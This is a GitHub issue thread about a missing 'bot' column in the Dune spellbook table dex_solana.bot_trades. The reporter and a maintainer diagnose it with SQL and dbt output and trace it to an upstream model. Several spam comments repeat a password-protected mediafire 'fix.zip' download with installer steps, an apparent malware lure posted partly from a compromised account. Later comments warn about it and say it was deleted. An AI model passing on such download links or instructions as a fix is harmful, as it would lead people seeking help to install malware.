### ISSUE TITLE
[BUG] bot column missing in dex_solana.bot_trades

### ISSUE THREAD

**Issue by kunalmodi** [duneanalytics/spellbook#6610]
### Description

After https://github.com/duneanalytics/spellbook/pull/6288/ landed, I was expecting to see a new `bot` column in `dex_solana.bot_trades`. But it doesn't seem to exist:
```
select bot
from dex_solana.bot_trades
limit 10
```

```
Error: Line 1:8: Column 'bot' cannot be resolved at line 1, position 8. Please verify that this column exists using the data explorer. Learn how to use the data explorer here: https://dune.com/docs/app/query-editor/data-explorer [Execution ID: 01J67KSAJDTR62WZQPGZQMRQP8].
```

I could be querying the wrong table, so wanted to double check where this new column would be visible in SQL (if anywhere).

Thanks!

### Impacted model(s)
```
dex_solana.bot_trades
```

**Comment by nxllxvxxd** [comment]
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by nxllxvxxd** [comment]
# **DO NOT DOWNLOAD ANYTHING I HAVE POSTED AS A COMMENT MY ACCOUNT WAS COMPROMISED AND BEING USED TO COMPROMISE OTHERS**

**I AM WORKING ON DELETING AND POSTING THIS ON ALL THREADS IN WHICH THEY USED MY ACCOUNT TO POST THIS**

**Comment by mohamed-elsankary** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by mohamed-elsankary** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by mohamed-elsankary** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/6mkbh6xhau31g
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by jeff-dude** [comment]
hi @kunalmodi thank you for raising.

i'm not sure on these other comments, i have blocked the user and reported, deleted from here.

can you confirm if all of the platform-level spells that build the final `dex_solana.bot_trades` contain the hardcoded `bot` column? can you query a few and ensure?

if so, then we likely just need to refresh the final spell. not sure why it got missed first time around.

**Comment by kunalmodi** [comment]
Hi @jeff-dude! Thanks for taking a look. It looks like it's just the final schema that needs to be refreshed.

Confirming that the individual projects that this is sourced from do have this column available and set:
```
SELECT bot FROM trojan_solana.bot_trades LIMIT 1
SELECT bot FROM bonkbot_solana.bot_trades LIMIT 1
SELECT bot FROM magnum_solana.bot_trades LIMIT 1
SELECT bot FROM readyswap_solana.bot_trades LIMIT 1
```

**Comment by jeff-dude** [comment]
i just attempted to refresh the final view, but received:
```
20:06:17    Database Error in model dex_solana_bot_trades (models/_sector/dex/bot_trades/solana/dex_solana_bot_trades.sql)
  TrinoUserError(type=USER_ERROR, name=COLUMN_NOT_FOUND, message="line 369:8: Column 'bot' cannot be resolved", query_id=20240826_200616_01467_nfwdk)
```

this means one of the underlying is missing the column. do you have spellbook repo setup locally? can you run `dbt compile` in the solana subproject directory and grab output raw SQL, run on dune, and figure out which is missing the `bot` column? it should output a query of union all's on each platform upstream

**Comment by kunalmodi** [comment]
Found the dependent table without the bot column: https://github.com/duneanalytics/spellbook/pull/6616

**Comment by jeff-dude** [comment]
great, thank you! i have attached this issue to the PR, let's finalize there
